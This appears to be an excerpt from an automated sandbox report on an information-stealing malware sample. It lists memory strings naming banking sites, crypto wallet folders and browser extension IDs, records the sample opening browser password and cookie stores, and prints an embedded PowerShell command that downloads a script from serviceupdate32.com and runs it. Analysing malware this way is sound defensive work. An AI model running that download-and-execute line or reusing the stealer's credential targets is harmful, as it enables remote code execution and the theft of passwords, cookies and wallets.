Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413x |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696501413t |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - HKVMware20,11696501413] |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696501413s |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696501413u |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - EU WestVMware20,11696501413n |
Source: file.exe |
Binary or memory string: ws.updaterId.jappsrvVMwareEaseUSSignalOneDriveDRPSuPerfLogsNox_shareapp.jsonCacheLocal StateFree_PDF_SolutionsSnapshotsHottaMicrosoftEdgeBackupsobs-studio.xlsWordTeamViewer\TextPredictionPC HelpSoft Driver UpdaterWindows Live.pwdclaveSYACPixelSee LLCdictionariesRainmeterLGHUBCode - Insiders\linkElectronic ArtsProtectMMCJaxxwalletkeyZaloDatawaves-clientGuest Profile.nextNumpad.vscodeadspower_global\cjelfplplebdjjenllpjcblmjkfcffneMultiBitHDavaxmodulesnode_modulesnlbmnnijcnlegkjjpcfjclmcfggfefdm%d x %dProgram FilesOpenOfficeHewlett-Packardafbcbjpbpfadlkmhmclhkeeodmamcflcworkspace-storageHD-PlayerHPPreferencestrxmailSandboxaholpfdialjgjfhomihkjbmgjidlcdno.rtfSlackTegraRcmGUIuser_datapythonProjectForagerOfficeGoogleUpdaterEOS Webcam UtilitystorageEvernoteLlave.jpegExodus EdenUbiquiti UniFiuser_data#2citizenfxfhilaheimglignddkjgofkcbgekhenbhUnrealEngineLauncherwebcacheViberPCBackupblob_storageCachedDatauser_data#3user_data#4bluestacks-servicesCodepassfactorClickUpqmlIK Product ManagerWeModXiaomiSketchUpproductiontupdatesPowerISOcom.liberty.jaxx3D ObjectsWargaming.net%wS (%wS)accountWhatsApp\.jdksLedger Live\integrationsbackupRealNetworksUARhpglfhgfnhbgpjdenjgmdgoeiappaflnCrystal Dynamicsnpm-cacheSamsungSumatraPDFreposCapCut DraftsVisual StudioValve CorporationPicasa2FacebookWebTorrenttastytradebluestacks-services\nodClSmartSteamEmuMetaQuotesCreativeEOS-Webcam-UtilitywebviewCrashReportDBPower BI DesktopCrashRptIntel_CorporationiTop Easy DesktopegjidjbpglichdcondbcbdnbeeppgdphpluginsToolbarookjlbkiijinhpmnjffcofjonbfbgaocActivisionCode CacheRealPlayertwofactordexbhhhlbepdkbapadjdnnojkbgioiodbic.metadataPlay GamesCode\PycharmProjectsLocal StoreBeamNG.drive.thinkorswimSteamWinRAROneNotePrometheanIndexedDBffnbelfdoeiohenkjibnmadjiehjhajbwebview_cache.gitTeamsMeetingAddinkkpllkodjeloidieedojogacfhpaihoh/home/anal/bot/zip_include/miniz.hpArray->m_element_sized->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]bits <= ((1U << len) - 1U)d->m_huff_code_sizes[1][sym]d->m_huff_code_sizes[0][lit]before create bufferbefore addCryptoWalletsbefore addDatAndEthFilessendingcode < TDEFL_MAX_HUFF_SYMBOLS_2 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.comVMware20,11696501413} |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.co.inVMware20,11696501413d |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696501413t |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^ |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactiveuserers.comVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696501413f |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696501413 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_0079116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, |
5_2_0079116C |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_00791160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, |
5_2_00791160 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_007911A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, |
5_2_007911A3 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_007913C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, |
5_2_007913C9 |
Source: Yara match |
File source: 5.2.service123.exe.6c9d0000.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000003.1899287053.000000000434C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: file.exe PID: 7680, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: service123.exe PID: 7180, type: MEMORYSTR |
Source: file.exe |
String found in binary or memory: Electrum BTCP |
Source: file.exe |
String found in binary or memory: \ElectronCash\wallets |
Source: file.exe, 00000000.00000002.1915650954.0000000001128000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Opera Software\Opera NextOpera Software\Opera Crypto Stable\@trezor\bitbox\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)atomic\Local Storage\leveldbODISBlizzardsa.edu.ksa.ayatWaves Audiotemp/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$Resp = Invoke-WebRequest -Uri 'https://serviceupdate32.com/update' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr"Unknown %d (Version: ) |
Source: file.exe |
String found in binary or memory: com.liberty.jaxx |
Source: file.exe |
String found in binary or memory: \Exodus\backup |
Source: file.exe |
String found in binary or memory: Exodus Eden |
Source: file.exe |
String found in binary or memory: Ethereum (UTC) |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
Jump to behavior |